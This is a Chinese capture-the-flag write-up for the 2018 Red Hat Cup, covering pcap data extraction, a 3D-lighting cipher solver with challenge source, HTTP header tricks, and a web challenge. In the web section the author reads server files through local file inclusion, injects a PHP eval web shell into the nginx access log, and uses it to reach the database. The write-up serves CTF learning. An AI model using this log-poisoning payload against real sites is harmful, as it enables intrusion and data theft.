红帽杯2018_Writeup

2018-05-01

× 文章目录

1. 0X01 Not Only Wireshark
2. 0X02 3Dlight

3. 0X03 shopping log

4. 0x04 biubiubiu

5. 0X05 附录：3Dlight题目源码

对于这次红帽杯的题目。。是真的很想吐槽啊。。

0X01 Not Only Wireshark

wireshark打开数据包，右键追踪TCP流，可发现从第15流开始，HTTP请求的路径和参数变为/sqli/example2.php?name=123。
写了个脚本正则按顺序抓下来所有name参数的值。

import re
f = open("Not Only Wireshark.pcapng", "rb")
c = f.read().decode('utf8','ignore')
f.close()
x = re.findall(r'example2\.php\?name=([0-9A-Za-z]{0,10})', c)[5:]
x = '5'+''.join(x)[4:] # 开头的1234替换成5
g = open('flag.zip','wb')
for i in range(0, len(x), 2):
    s = chr(int(x[i:i+2], 16)).encode('latin-1')
    g.write(s)
g.close()

然后迎来了第一个吐槽到死的点，zip里面的文件是加密的，密码在哪？？？
找了将近一下午，后来发现HTTP请求中有个GET请求是?id=1128%23。微笑不起来:)

0X02 3Dlight

这题我觉得还是挺有意思的，虽然花的时间也不少。（题目源码放在文章最后…
知道题目是啥意思后，要做的主要有以下几点：

对str2arr(str)和arr2str(arr)函数进行逆运算。
判断三维数组中哪些点必须‘-2’，哪些只可能‘-1’，只能‘-1’的点或list存入finL集合中
对三维数组进行遍历，遍历过程中判断该点是否‘需要-2’

对于第二个问题：

一个正常的38位flag填充到64位后大概长flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}00000000000000000000000000这样。
经过shuffle_flag后长f0a0{0x0x0x0x0x0x0x0x0x0x0x}xxxxxxxxxx0x0x0x0x0x0x0x0x0x0x0x0g0l这样。

因此可以得出，f、l、a、g、{、}在数组中的固定位置和固定取值

s[0] = 'f'
s[63] = 'l'
s[2] = 'a'
s[61] = 'g'
s[4] = '{' 
s[27] = '}'
arr[0][0] = [0, 1, 1, 0, 0, 1, 1, 0] == [(ord('f') >> g & 1) for g in range(8)]
arr[7][7] = [0, 0, 1, 1, 0, 1, 1, 0]
...

同时也可以得出，所有为x的字符所在的index他的ascii值范围必须是32<ord({x})<127。

1 2	bin(127)[2:].zfill(8)[::-1] == '11111110' # 反转后下标7的位置固定为0，因此只能-1，不能-2

对于第三个问题：

在遍历中，对<1的值，直接return
对==1的值，判断周围的6个方向是否有且仅有一个方向值>=2，如果有，那个方向的点就unlight处理
对>=2的值，判断该点能否unlight-2。判断主要是如下办法：周围6个方向>=2的值的点的个数是否比我这个点的值还小。（通俗点说就是即使你们6个方向都给我1，我扣掉6还有剩，那就代表我肯定要-2）

但是存在一个问题：如何判断周围6个点有给1可能的个数？
方法：那个方向的点存在，并且值>=2。同时，那个点满足“可以-2”，即那个点不在finL集合中。

解密代码

# _*_ coding: utf-8 _*_
# python 2.x
def unstr2arr(arr):
    s = ''
    for i in arr:
        for j in i:
            tmp = 0
            for x in j[::-1]:
                tmp = (tmp << 1) + x
            s += chr(tmp)
    return s
def unarr2str(s):
    arr = [[[ord(s[i*64+j*8+k]) for k in range(8)] for j in range(8)] for i in range(8)]
    return arr
def check(x, y, z):
    if x < 0 or x > 7 or y < 0 or y > 7 or z < 0 or z > 7:
        return False
    return True
# arr[i][j][k]-2，周围的六个方向-1。
# 对-2的点。将result对应位置赋值为1
def unlight(i, j, k):
    result[i][j][k] = 1
    arr[i][j][k] -= 2
    for a, b, c in L:
        if check(i + a, j + b, k + c):
            arr[i + a][j + b][k + c] -= 1
def decrypt(i, j, k):
    count = 0
    tt = []
    if arr[i][j][k] < 1:
        return
    elif arr[i][j][k] == 1:
        for a, b, c in L:
            if check(i + a, j + b, k + c) and arr[i + a][j + b][k + c] >= 2:
                if not tt:
                    tt = [i + a, j + b, k + c]
                else:
                    return
        if tt:
            unlight(tt[0], tt[1], tt[2])
    else: 
        for a, b, c in L:
            if check(i + a, j + b, k + c) and arr[i + a][j + b][k + c] >= 2 and (i + a, j + b) not in finL and (i + a, j + b, k + c) not in finL:
                count += 1
        if arr[i][j][k] - count > 0:
            global onchange
            onchange = True
            unlight(i, j, k)
iList = []
# flag: 'flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}00000000000000000000000000'
fake = r'f0a0{0x0x0x0x0x0x0x0x0x0x0x}xxxxxxxxxx0x0x0x0x0x0x0x0x0x0x0x0g0l'
for i in range(64):
    if fake[i] != '0':
        iList.append(i)
d = {0 : 'f', 63 : 'l', 2 : 'a', 61 : 'g', 4 : '{', 27 : '}'} 
s='0203040102040502020201020204050403030000030406030504020304040604040603040605060203050506050505020403030103050502040503020304030304040303020504020505030302020503040303020305050301040304040506050205030305060603030607050607070303040303030605030404040102030204040302040405040006040305040402030405030304060301020103020505040303040301040703010406040507070201040305040707020103050505050503030302020203060402020302040606040206050504070702010504050405080502040303040507040105040403060703000404040406070201020405020406030203040302020605010302010206070201060502010607020005040203050704010203020305060401030201020407040202040302060704030203040305060201060606040305040206040302050703000403010306070201020202030706020102020204050503020404010103060603050505060607060504040404070602010506070501030303040505030206050303010603040706040002050505070401010305050706050204030302020607020505060403050605040505050405030102050604020303030304060201060503020405020106070402040602030505020205070504050501050504020205060203030302010507040202040303050402'
s = s.decode('hex')
arr = unarr2str(s)
result = [[[0 for _ in xrange(8)] for _ in xrange(8)] for _ in xrange(8)]
L =[[0, 0, 1], [0, 0, -1], [0, 1, 0], [0, -1, 0], [1, 0, 0], [-1, 0, 0]]
finL = set() # 存放只能-1不能-2的点和list，如点arr[m][n][7]和arr[0][0]
for j in iList: 
    n = j % 8
    m = (j - n) // 8
    finL.add((m, n, 7))
# 对f、l、a、g、{、}这6个字符的二进制中为1的位置，先进行unlight处理（中心-2.周围-1）
for k in d:
    L2 = [(ord(d[k]) >> g & 1) for g in range(8)]
    n = k % 8
    m = (k - n) // 8
    finL.add((m, n))
    for i in range(8):
        if L2[i] == 1:
            unlight(m, n, i)
while True:
    onchange = False
    for i in range(8):
        for j in range(8):
            for k in range(8):
                decrypt(i, j, k)
    if not onchange:
        break
#for i in range(8):
#    print(result[i])
#print('\n-----------------------------------\n')
#for i in range(8):
#    print(arr[i])
flag = ''
ss = unstr2arr(result)
for i in range(32):
    flag += ss[i*2]+ss[-1-i*2]
print(flag)

0X03 shopping log

提一下，主要是太想吐槽了。

提示Site is tmvb.com，玩了老半天，google了一波，whois查询了一波，爆破了子域名，Host也试着改成了Host: tmvb.com。后来才发现要加上www，excuse me??
改Referer很正常。
提示Japan sales only，试了改了Accept-Language: ja;q=0.9，也试过了XFF头为日本IP。都不行！！后来队友突然可以了，才发现要XFF头和language同时改！并且q=0.9要删去！excuse me??
终于有正常页面了。emm..爆破??

告辞！

0x04 biubiubiu

进去就是一波文件包含！试了下php://filter不管用，猜测应该是被过滤了。提示了users.sql感觉没是用。
然后就读了一波配置文件?page=/etc/nginx/nginx.conf爽歪歪。

##
# Logging Settings
##
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;

看到了日志文件路径就想到了包含日志文件写入php代码。反手一个php一句话?page=<?php @eval($_POST['key']);?>，下一步就是菜刀了。
看到了数据库的帐号密码，flag就在数据库里了。

conn.php

<?php
$db_host = 'mysql';
$db_name = 'user_admin';
$db_user = 'Dog';
$db_pwd = '';
$conn = mysqli_connect($db_host, $db_user, $db_pwd, $db_name);
if(!$conn){
    die(mysqli_connect_error());
}

挂下预期解：《记一次利用gopher的内网mysql盲注》

0X05 附录：3Dlight题目源码

import random
import signal
def str2arr(str):
    return [[[(ord(str[i * 8 + j]) >> k & 1) for k in xrange(8)] for j in xrange(8)] for i in xrange(8)]
def arr2str(arr):
    ret = ''
    for i in xrange(8):
        for j in xrange(8):
            for k in xrange(8):
                ret += chr(arr[i][j][k])
    return ret
def check(x, y, z):
    if x < 0 or x > 7 or y < 0 or y > 7 or z < 0 or z > 7:
        return False
    return True
def light(arr, i, j, k, x, y, z, power):
    if check(i + x, j + y, k + z):
        arr[i + x][j + y][k + z] += power
    if x != 0 and check(i - x, j + y, k + z):
        arr[i - x][j + y][k + z] += power
    if y != 0 and check(i + x, j - y, k + z):
        arr[i + x][j - y][k + z] += power
    if z != 0 and check(i + x, j + y, k - z):
        arr[i + x][j + y][k - z] += power
    if x != 0 and y != 0 and check(i - x, j - y, k + z):
        arr[i - x][j - y][k + z] += power
    if x != 0 and z != 0 and check(i - x, j + y, k - z):
        arr[i - x][j + y][k - z] += power
    if y != 0 and z != 0 and check(i + x, j - y, k - z):
        arr[i + x][j - y][k - z] += power
    if x != 0 and y != 0 and z != 0 and check(i - x, j - y, k - z):
        arr[i - x][j - y][k - z] += power
def encrypt(flag, power):
    ret = [[[0 for _ in xrange(8)] for _ in xrange(8)] for _ in xrange(8)]
    lights = str2arr(flag)
    for i in range(8):
        for j in range(8):
            for k in range(8):
                if lights[i][j][k] == 1:
                    for x in range(power):
                        for y in range(power - x):
                            for z in range(power - x - y):
                                light(ret, i, j, k, x, y, z, power - x - y - z)
    return arr2str(ret)
def welcom():
    signal.alarm(5)
    print r"""
 _____   ____    _       ___    ____   _   _   _____ 
|___ /  |  _ \  | |     |_ _|  / ___| | | | | |_   _|
  |_ \  | | | | | |      | |  | |  _  | |_| |   | |  
 ___) | | |_| | | |___   | |  | |_| | |  _  |   | |  
|____/  |____/  |_____| |___|  \____| |_| |_|   |_| 
We make a 3d scene model with a lot of lights. They can provide lighting for the surrounding space.
For exmaple, the power of lights is p, one of lights is l(x, y, z) and one position is s(x', y', z').
So, the distance between l and s is d = abs(x - x') + abs(y - y') + abs(z - z'), and l can provide for s with
             |  p - d, p > d
lighting  =  |
             |  0    , p <= d
Now, we transform the flag padded randomly to positions of lights, and you may get the flag ciphertext. Have fun!
"""
def main():
    welcom()
    flag = open('./flag', 'r').read()
    assert(len(flag) == 38)
    for _ in range(64 - 38):
        flag += chr(random.randint(0, 255))
    shuffle_flag = ''.join(flag[0::2][i] + flag[-1::-2][i] for i in xrange(32))
    power = 2
    assert(power > 1)
    assert(power < 6)
    cipher = encrypt(shuffle_flag, power)
    print 'Light power is : %d' % power
    print 'Your flag ciphertext is : %s' % cipher.encode('hex')
if __name__ == '__main__':
    main()